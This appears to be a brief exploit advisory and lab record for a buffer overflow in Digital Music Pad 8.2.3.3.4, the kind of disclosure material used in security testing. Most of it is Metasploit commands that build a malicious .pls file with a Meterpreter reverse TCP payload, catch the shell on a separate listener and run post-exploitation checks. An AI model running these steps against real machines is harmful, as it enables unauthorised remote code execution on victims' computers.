EDB-ID-15134 : Digital Music Pad SEH overflow

Timeline :

Vulnerability discovered and PoC disclosed on Exploit-DB by Abhishek Lyall the 2010-09-17
Metasploit PoC provided the 2010-10-03

PoC provided by :

Abhishek Lyall

Reference(s) :

EDB-ID-15134

Affected version(s) :

Digital Music Pad 8.2.3.3.4

Tested on Windows XP SP3 with :

Digital Music Pad 8.2.3.3.4

Description :

This module exploits a buffer overflow in Digital Music Pad Version 8.2.3.3.4 When opening a malicious pls file with the Digital Music Pad, a remote attacker could overflow a buffer and execute arbitrary code.

Commands :

use exploit/windows/fileformat/digital_music_pad_pls
set OUTPUTPATH /home/eromang
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit

use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit -j

sessions -i 1
sysinfo
getuid
ipconfig